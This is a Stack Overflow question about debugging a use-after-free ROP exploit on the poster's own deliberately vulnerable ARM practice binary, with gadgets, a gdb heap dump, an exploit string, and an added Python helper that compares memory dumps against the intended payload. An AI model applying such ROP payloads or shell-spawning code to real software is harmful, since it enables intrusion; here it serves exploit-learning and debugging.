My program is crashing at 0x16 even with my ROP chain

So I recently started working on my binary which is vulnerable to Use-After-Free. I found it too easy to just jump to secret(), so I added a variable to the _DATA section and set its value to 0, and then I added a hard-coded check in secret:

if (check == 0) {
    exit(0);
}
system("/bin/sh");
...

I also added a few "setup gadgets" to my code.
This is my "write gadget":

__asm__("str r0,[r1]");

and this is my setup gadget for the write gadget:

__asm__("pop {r0,r1,pc}");

Heap with my data on it:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000016
0x00000014 in ?? ()
(gdb) x/64wx 0x12edf0
0x12edf0: 0x41414141 0x42424242 0x43434343 0x44444444
0x12ee00: 0x45454545 0x46464646 0x47474747 0x48484848
0x12ee10: 0x0000bb8c 0xc0503149 0xbb800000 0xb96c0000
0x12ee20: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee30: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee40: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee50: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee60: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee70: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee80: 0x00000000 0x00000000 0x00000000 0x00000000
0x12ee90: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eeb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eec0: 0x60000000 0x60000000 0x00000004 0x00000000
0x12eed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x12eee0: 0x00000000 0x00000000 0x00000000 0x00000000

and here is my exploit string: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH\x8c\xbb\x00\x001111\x50\xc0\x00\x00\x80\xbb\x00\x00\x6c\xb9\x00\x00

Secret:

0x0000b96c <secret+0>:  80 40 2d e9                   push  {r7, lr}

gadget:

0x0000bb8c <gadget+0>:  03 80 bd e8                   pop   {r0, r1, pc}

The 0x00c050 is where my variable is.

writeGadget:

0x0000bb80 <writeGadget+4>:  00 00 81 e5                   str  r0, [r1]

Does anybody know why it's crashing at 0x16, and how to fix it? Thanks

c
arm
exploit
asked on Stack Overflow Mar 11, 2019 by Tomi Tokics • edited Mar 13, 2019 by Tomi Tokics
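A first triage step for any crash of this kind is to check that the bytes which landed in memory are the bytes that were meant to be sent, before reasoning about what the CPU did with them. The Python helper below is an added example, not code from the post: it parses the `x/Nwx` output gdb prints, rebuilds the little-endian byte string it represents, and reports the first offset at which it differs from an intended input. The dump and the intended string are copied from the post above and embedded as constructed sample data; run on them, the helper reports that the two agree up to offset 36 and then differ (the dump holds 49 31 50 c0 where 31 31 31 31 was expected).

```python
import re
from typing import List, Optional, Tuple

# Constructed sample data, copied from the post: the first lines of the
# `x/64wx 0x12edf0` dump and the string the poster intended to send.
GDB_DUMP = """\
0x12edf0: 0x41414141 0x42424242 0x43434343 0x44444444
0x12ee00: 0x45454545 0x46464646 0x47474747 0x48484848
0x12ee10: 0x0000bb8c 0xc0503149 0xbb800000 0xb96c0000
0x12ee20: 0x00000000 0x00000000 0x00000000 0x00000000
"""

INTENDED = (b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH"
            b"\x8c\xbb\x00\x00" b"1111" b"\x50\xc0\x00\x00"
            b"\x80\xbb\x00\x00" b"\x6c\xb9\x00\x00")

# One gdb line: "<addr>: <word> <word> ..." with 8-hex-digit words.
LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")


def parse_gdb_words(dump: str) -> Tuple[int, bytes]:
    """Turn `x/Nwx` output into (base address, little-endian byte string).

    gdb prints each 32-bit word as a number, so 0x0000bb8c in the dump
    corresponds to the bytes 8c bb 00 00 in memory on a little-endian ARM.
    """
    base: Optional[int] = None
    next_addr: Optional[int] = None
    out = bytearray()
    for line in dump.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # prompts, register lines, etc. are ignored
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != next_addr:
            raise ValueError(f"non-contiguous dump at {addr:#x}")
        words = [int(w, 16) for w in m.group(2).split()]
        for w in words:
            out += w.to_bytes(4, "little")
        next_addr = addr + 4 * len(words)
    if base is None:
        raise ValueError("no dump lines found")
    return base, bytes(out)


def first_divergence(actual: bytes, intended: bytes) -> Optional[int]:
    """Offset of the first byte that differs, or None if `intended` is a prefix."""
    for i, (a, b) in enumerate(zip(actual, intended)):
        if a != b:
            return i
    if len(actual) < len(intended):
        return len(actual)  # dump ended before the intended input did
    return None


def words_at(data: bytes, offset: int, count: int) -> List[int]:
    """The `count` little-endian 32-bit words starting at `offset`."""
    return [int.from_bytes(data[offset + 4 * i: offset + 4 * i + 4], "little")
            for i in range(count)]


def triage(dump: str, intended: bytes) -> str:
    """Human-readable summary of where memory stops matching the intended input."""
    base, data = parse_gdb_words(dump)
    off = first_divergence(data, intended)
    if off is None:
        return f"memory at {base:#x} matches the intended input ({len(intended)} bytes)"
    got = data[off:off + 4].hex(" ")
    want = intended[off:off + 4].hex(" ")
    return (f"first difference at offset {off} (address {base + off:#x}): "
            f"memory has {got}, intended {want}")


if __name__ == "__main__":
    print(triage(GDB_DUMP, INTENDED))
```

The check is deliberately byte-wise rather than word-wise: a single missing or extra byte shifts every following word, and seeing the exact offset of the first difference tells you whether to look at how the input was encoded or at what the program did with it after reading it.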

0 Answers

Nobody has answered this question yet.


User contributions licensed under CC BY-SA 3.0